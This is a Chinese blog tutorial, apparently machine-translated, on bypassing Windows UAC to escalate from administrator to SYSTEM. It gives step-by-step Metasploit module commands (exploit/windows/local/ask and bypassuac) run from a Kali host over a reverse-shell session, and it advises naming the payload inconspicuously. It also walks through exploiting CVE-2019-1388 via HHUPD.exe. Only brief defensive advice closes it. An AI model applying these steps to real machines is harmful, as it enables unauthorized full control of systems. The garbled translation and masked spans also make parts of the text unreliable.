什么是UAC?
UAC(用户账户控制)是用户账户控制的简称。UAC是Windows Vista以上的版本,在执行可能影响计算机操作的操作或更改影响其他用户的设置之前,需要用户提供权限或管理员密码。
UAC工作模式
需要UAC授权的业务:
配置Windows Update增加、删除账户;更改账户类型更改UAC的设置安装ActiveX;安装、卸载程序安装设备驱动程序将文件移动/***到ProgramFiles或Windows目录下查看其它用户的文件夹
UAC有以下四个设置要求:
始终通知:这是最严格的设置,每当有程序需要使用高级别的权限时都会提示本地用户仅在程序试图更改我的计算机时通知我:这是UAC的默认设置。当本地Windows程序要使用高级别的权限时,不会通知用户。但是,当第三方程序要使用高级别的权限时,会提示本地用户仅在程序试图更改我的计算机时通知我(不降低桌面的亮度):与上一条设置的要求相同,但在提示用户时不降低桌面的亮度从不提示:当用户为系统管理员时,所有程序都会以最高权限运行
绕过UAC的几种想法
目前,有以下几种方法可以绕过UAC:
白名单劫持(利用白名单程序是该程序以系统权限启动且不用通知用户,只要我们找到相关程序劫持它,此时只要程序启动,也会带着我们的程序以系统权限启动。)DLL 劫持Windows 自身漏洞提权远程注入COM 接**术
绕过UAC提高功率的方法
1.使用Metasploit绕过UAC来声明权限
实验环境:
l目标主机:Windows 7专业版SP1(***位):192.168.178.246
l攻击主机:Kali:192.168.178.131
l攻击主机获得了目标主机的反弹shell(管理员权限),接收端口为2333。
在前期使用rebound shell获取windows 7会话的前提下,如果要从管理员权限升级到系统权限,由于UAC问题,不能直接使用命令' get system ',所以要想办法先绕过UAC,再使用命名管道提升权限。
获取反弹场次的方法,请参考之前的文章:明说|几种常见的反弹壳方式。
1.使用exploit/windows/local/ask模块绕过UAC
该模块将创建一个可执行文件,目标机器将运行一个程序,该程序启动权限提升请求,提示用户是否继续运行。如果用户选择继续运行程序,将返回一个具有系统权限的shell。
攻击主机执行MSF命令:
#首先将并轨会话放在后台。
Ctrl+Z
#模块使用
使用exploit/windows/local/ask
设置文件名update.exe #设置运行程序的名称,尽量设置一个不容易找到的名称。
设置会话17
设置lhost 192.168.178.131
设置lport 2333
奔跑
此时,win7上会弹出UAC提醒,一旦用户点击‘是’,就会绕过UAC。
Kali得到了新的会话响应,并在新的会话中成功执行了功率提升命令“GET SYSTEM ”:
2.利用/Windows/本地/绕过UAC模块绕过UAC
该模块通过进程注入使用受信任的发行者证书绕过Windows UAC。使用此模块时,当前用户必须在管理员组中,并且UAC必须是默认设置(“仅当程序试图更改我的计算机时提醒我”)。
#同样,获取会话后,在执行以下命令之前,会话将被置于后台:
Ctrl+Z
#模块使用
使用exploit/windows/local/bypassuac
设置会话7
设置lhost 192.168.178.131
设置lport 2333
奔跑
Kali得到了新的会话响应,并在新的会话中成功执行了功率提升命令“GET SYSTEM ”:
二。利用CVE-2019-1388绕过UAC提权
该漏洞存在于Windows的UAC(用户帐户控制)机制中。默认情况下,Windows将在一个桌面上显示所有UAC提示-安全桌面。这些提示由一个名为consent.exe的可执行文件生成,该文件以NT AUTHORITY\SYSTEM权限运行,完整性级别为SYSTEM。
#漏洞程序:
HHUPD.exe
下载地址:https://github.com/jas502n/CVE-2019-1388
#重复环境:
Windows企业版service pack 1 (***位)
当前权限:管理员
#提升权力的过程
1.打开HHUPD.EXE,在UAC提示中选择“显示详细信息”,然后点按“显示关于此发行者的证书信息”。
2.点击“发卡行”的超链接,然后关闭UAC提示。
3.在弹出的页面中选择“页面”->:点击“另存为”。
4.在弹出的警告框中单击确定。
5.输入:C:\Windows\System32\*。*
6.找到cmd,右键打开。
7.在命令行输入“whoami”发现这是当前的系统特权。
三。其他攻击模块
Metasploit的其他bypassuac模块,霓裳中的Invoke-Psuacme模块,帝国中的bypassuac模块都可以用来绕过UAC进行功率提升,有兴趣的可以自行深入研究。
绕过UAC的防守思路
在企业网络环境中,防止绕过UAC的最好方法是不让内网机器的使用者拥有本地管理员权限,从而降低系统遭受攻击的可能性。在家庭网络环境中,建议使用非管理员权限进行日常办公与娱乐等活动。使用本地管理员权限登录的用户,将UAC设置为“始终通知”或者删除该用户的本地管理员权限。
好了,这篇文章的内容千里马号就和大家分享到这里!
本文来自年轻人玩的就是心跳投稿,不代表舒华文档立场,如若转载,请注明出处:https://www.chinashuhua.cn/24/642710.html
微信扫一扫 
